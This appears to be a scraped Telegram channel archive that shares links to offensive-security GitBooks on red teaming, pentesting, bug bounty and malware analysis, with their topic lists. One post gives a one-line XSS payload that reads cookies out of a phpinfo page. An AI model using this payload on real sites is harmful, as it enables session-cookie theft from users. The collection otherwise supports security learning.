uz
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

Kanalga Telegram’da o‘tish
7 451
Obunachilar
+524 soatlar
+107 kunlar
+17130 kunlar
Postlar arxiv
𝗥𝗲𝗱 𝗧𝗲𝗮𝗺 & 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 >RED TEAMING •Cheat Sheet •Active Directory 101 •Fuzzing and Web •Initial Foothold •Privilege Escalation (Privesc) •Lateral Movement (Pivoting) •Persistence •Command and Control (C&C) •Data Exfiltration •CVE & Exploits / CTF >MALWARE ANALYSIS •Unpacking •Basic tips •Malware instrumentation with frida >MOBILE •Reverse iOS ipa •Reverse Android APKs •Basic tips >IOT / REVERSE / FIRMWARE •Basic tips •Reverse IoT devices Link 🔗:- https://gitbook.seguranca-informatica.pt/ @GitBook_s

𝗥𝗲𝗱 𝗧𝗲𝗮𝗺 𝗡𝗼𝘁𝗲𝘀 >RED TEAM TECHNIQUES ~Initial Access •T1190: Exploit Public-Facing Applications •T1133: External Remote Services •T1566: Phishing •T1195: Supply Chain Compromise •T1078: Valid Accounts •T1199: Trusted Relationship ~Execution •T1047:Windows Management Instrumentation •T1204: User Execution •T1569: Service Execution •T1053: Scheduled Tasks/Job •T1106: Native API •T1559: Inter-Process Communication •T1203: Exploitation for Client Execution •T1059: Command and Scripting Interpreter ~Persistence •T1574: Hijack Execution Flow •T1133:External Remote Services •T1546:Event Triggered Execution •T1543:Create or Modify System Process •T1136: Create Account •T1554:Compromise Client Software Binary •T1547:Boot or Logon AutoStart Execution •T1197: BITS Jobs •T1053: Scheduled Tasks/Job •T1098: Account Manipulation.. >RED TEAM INFRASTRUCTURE ~Reconnaissance •Passive •Active ~Weaponization •Macros •HTA •ZIP •ISO ~Delivery •Gophish •EvilGinx •PwnDrop ~Situational Awareness •Covenant and C# •Empire and PowerShell ~Credential Dumping •Mimikatz •Lsass Dumping •SharpChromium ~Persistence •Userland Persistence •Elevated Persistence ~Defense Evasion •Disable or Modify Tools •Obfuscating Files ~Privilege Escalation •PowerUp •PrivescCheck ~Lateral Movement •RDP •PowerShell Remoting Link 🔗:- https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team @GitBook_s

𝗢𝗳𝗳𝘀𝗲𝗰 𝗝𝗼𝘂𝗿𝗻𝗲𝘆 𝗡𝗼𝘁𝗲𝘀 >LEARNING RESOURCES •Web App Pentesting >RECONNAISANCE •OSINT •Vulnerability Scabbing >RESOURCE DEVELOPMENT •Password Crack Rig •Malware •C2 Infrastructure •Phishing Infrastructure >INITIAL ACCESS •Phishing •Password Spray •Malicious Outlook Rules >HOST TRIAGE •Situational Awareness >INTERNAL RECONNAISSANCE •Enumeration •Lateral Movement •Misc. >DEFENSE EVASION •Dynamic Analysis •Static Analysis •General •Windows Internals •Execution •.NET Post Exploitation •Powershell •AMSI >PRIVILEGE ESCALATION •Domain Privilege Escalation •Local Priv Esc - Windows •Local Priv Esc - Linux >LATERAL MOVEMENT •Tunnels & Port Forward >PERSISTENCE •Local Persistence •Domain Persistence >LINUX •Enumeration •Lateral Movement •Misc. •Exploitation Techniques •Exploit Dev >KALI LINUX FU •Kali Fu •File System >SCANNING & ENUMERATION •Redis •Port Scan •RPC •Kerberos •WinRM •Telnet •PBX •RDP •Finger •VNC •Mail Servers •SSH •SMB •Content Management Systems •FTP •Web Server •DNS •LDAP •Database Services •IKE VPN Service •SNMP •Sniffing >WEB APP VULNERABILITIES •Directory Traversal •Server-Side Template Injection •HTTP Parameter Pollution •Sensitive Data Exposure •Broken Access Control •Business Logic Testing •Broken Authentication •XXE •File Inclusion •SSRF •Injection •Insecure Deserialization •Cross-Site-Scripting (XSS) >API PENTESTING •Resources >PROGRAMMING •Bash >MAINTAINING ACCESS •C2 - Command & Control •Notes >CLOUD SECURITY PENTEST •Penetration Testing AWS Storage •Pentesting Azure •Pentesting Cloud Networks >BLUE TEAM •Home Lab •Reverse Engineering •Forensics >REVERSE ENGINEERING •Malware Analysis •Buffer Overflow •Learning Resources >HOME LAB PROJECT •Initial Configuration •Active Directory >EXFILTRATION •Attack Vectors >WIRELESS PENTESTING •Radius Link 🔗:- https://notes.offsec-journey.com/ @GitBook_s

𝗢𝗳𝗳𝘀𝗲𝗰 𝗝𝗼𝘂𝗿𝗻𝗲𝘆 𝗡𝗼𝘁𝗲𝘀 >LEARNING RESOURCES •Web App Pentesting >RECONNAISANCE •OSINT •Vulnerability Scabbing >RESOURCE DEVELOPMENT •Password Crack Rig •Malware •C2 Infrastructure •Phishing Infrastructure >INITIAL ACCESS •Phishing •Password Spray •Malicious Outlook Rules >HOST TRIAGE •Situational Awareness >INTERNAL RECONNAISSANCE •Enumeration •Lateral Movement •Misc. >DEFENSE EVASION •Dynamic Analysis •Static Analysis •General •Windows Internals •Execution •.NET Post Exploitation •Powershell •AMSI >PRIVILEGE ESCALATION •Domain Privilege Escalation •Local Priv Esc - Windows •Local Priv Esc - Linux >LATERAL MOVEMENT •Tunnels & Port Forward >PERSISTENCE •Local Persistence •Domain Persistence >LINUX •Enumeration •Lateral Movement •Misc. •Exploitation Techniques •Exploit Dev >KALI LINUX FU •Kali Fu •File System >SCANNING & ENUMERATION •Redis •Port Scan •RPC •Kerberos •WinRM •Telnet •PBX •RDP •Finger •VNC •Mail Servers •SSH •SMB •Content Management Systems •FTP •Web Server •DNS •LDAP •Database Services •IKE VPN Service •SNMP •Sniffing >WEB APP VULNERABILITIES •Directory Traversal •Server-Side Template Injection •HTTP Parameter Pollution •Sensitive Data Exposure •Broken Access Control •Business Logic Testing •Broken Authentication •XXE •File Inclusion •SSRF •Injection •Insecure Deserialization •Cross-Site-Scripting (XSS) >API PENTESTING •Resources >PROGRAMMING •Bash >MAINTAINING ACCESS •C2 - Command & Control •Notes >CLOUD SECURITY PENTEST •Penetration Testing AWS Storage •Pentesting Azure •Pentesting Cloud Networks >BLUE TEAM •Home Lab •Reverse Engineering •Forensics >REVERSE ENGINEERING •Malware Analysis •Buffer Overflow •Learning Resources >HOME LAB PROJECT •Initial Configuration •Active Directory >EXFILTRATION •Attack Vectors >WIRELESS PENTESTING •Radius Link 🔗:- https://notes.offsec-journey.com/ @GitBook_s

𝗣𝗲𝗻𝘁𝗲𝘀𝘁 𝗕𝗼𝗼𝗸 𝗯𝘆 𝗻𝟯𝘁_𝗵𝘂𝗻𝘁𝟯𝗿 >Cloud Pentesting •AWS Security Testing •Azure Pentesting •GCP Pentesting >Web Application Pentesting •XSS <Cross Site Scripting> •XSS Filter Evasion and WAF Bypassing Tactics •SSRF <Server Side Request Forgery> •Open Redirect Vulnerability •Command Injection •File Upload •Rate Limit Bypass Techniques •IDOR •Web Cache Poisoning /Web Cache Deception •CSRF <Cross Site Request Forgery> •XPATH injection •LDAP Injection •JWT Vulnerabilities <Json Web Tokens> •CORS - Misconfigurations & Bypass •Reset/Forgotten Password Bypass •CRLF (%0D%0A) Injection •Clickjacking •Hostile Domain/Subdomain takeover •Server Side Inclusion/Edge Side Inclusion Injection •HTTP Request Smuggling / HTTP Desync Attack •SAML Attacks •OAuth to Account takeover •Cross-site WebSocket hijacking (CSWSH) •Uncovering CloudFlare •Email Header Injection •Unicode Normalization vulnerability •Registration Vulnerabilities •Race Condition Link 🔗:- https://n3t-hunt3r.gitbook.io/pentest-book/ @GitBook_s

𝗪𝗵𝗼𝗔𝗺𝗜 𝗪𝗿𝗶𝘁𝗲𝘂𝗽 •Web Cache Poisoning •Came looking for SSRF and found XSS •Phishing Attack using Machine Learning model •JWT Attacks •OAuth - Mechanism and Attacks •Upgrade plan from Free to Paid via Response Manipulation •XSS IN SOQL Console •Journey from Automated Discovery to Manual Exploitation Link 🔗:- https://ibraradi.gitbook.io/write-up/ @GitBook_s

𝗜𝗻𝗳𝗼𝘀𝗲𝗰 𝗕𝗹𝗼𝗴 •Web Application Findings •Recon automation, tips and tricks •Hack The Box Machines •CTF Challenges •Red Teaming Tips & Tricks •Cloud Security Link 🔗:- https://eslam3kl.gitbook.io/blog/ @GitBook_s

𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿 𝗛𝗮𝗻𝗱𝗯𝗼𝗼𝗸 •Getting Started in InfoSec and Bug Bounties •Presentations •Checklists / Guides •Useful Twitter Threads •List of Vulnerabilities •API Security •Mobile Security •Fuzzing / Wordlists •BugBounty Short Write-ups •Burp Suite Tips and Tricks •HackerOne Reports •Response Manipulation •Client Vs Server Side Vulnerabilities •AWS •Chaining of Bugs •Bug Bounty Automation •Mindmaps •Oneliner Collections •Red Teaming •Blue Teamining •Recon One Liners •Containers •Wordpress •Fuzzing / FuFF •OWASP ZAP •Bug List •Setting up burp collaborator •Admin Panel PwN •Credential Stuffing / Dump / •HaveibeenPwned? •Tools Required •Nuclei Template Link 🔗:- gowthams.gitbook.io/bughunter-handbook @GitBook_s

#SQLInjection @GitBook_s
#SQLInjection @GitBook_s

#ResponseManipulation @GitBook_s
#ResponseManipulation @GitBook_s

برای حمایت از کانال پست آخر رو تو گروه ها بفرستید To support the channel, send the last post to groups.

x=new XMLHttpRequest(); x.open('GET','//host/phpinfo',0); x.send();rx=/COOKIE'.*v"&gt;(.*?)
x=new XMLHttpRequest(); x.open('GET','//host/phpinfo',0); x.send();rx=/COOKIE'.*v">(.*?)</; alert(x.responseText.match(rx)[1]); #XSS @GitBook_s

Guys, how are the gitbooks? Do you like them? If you have any comments about them, please write to me.

بچه ها گیت بوک ها چطورین، خوب هستن، خوشتون میاد، در این مورد اگه نظری دارید بنویسید برام دلیل فورواردم اینه که بعضی ها اصلا اول کانال رو نگا نمیکنن

📖 Pentest Book by n3t_hunt3r XSS Filter Evasion and WAF Bypassing Tactics Cloud Pentesting Web App Pentesting Link 🔗:- https://n3t-hunt3r.gitbook.io/ @GitBook_s

Pentest Book Recon Enumeration Exploitation Post Exploitation Mobile Others Link 🔗:- http://six2dez.gitbook.io @GitBook_s

Breaking Bits Vulnerability Discovery CTF Firmware Emulator Exploit Development Link 🔗:- https://breaking-bits.gitbook.io/ @GitBook_s

Pentest Everything 🚩Writeups Everything Resources Link 🔗:- https://viperone.gitbook.io @GitBook_s

+ Application Security Cheat Sheet Android Application CI/CD Cloud Container Framework Linux iOS Application Resources Web Application Link 🔗:- https://0xn3va.gitbook.io/cheat-sheets @GitBook_s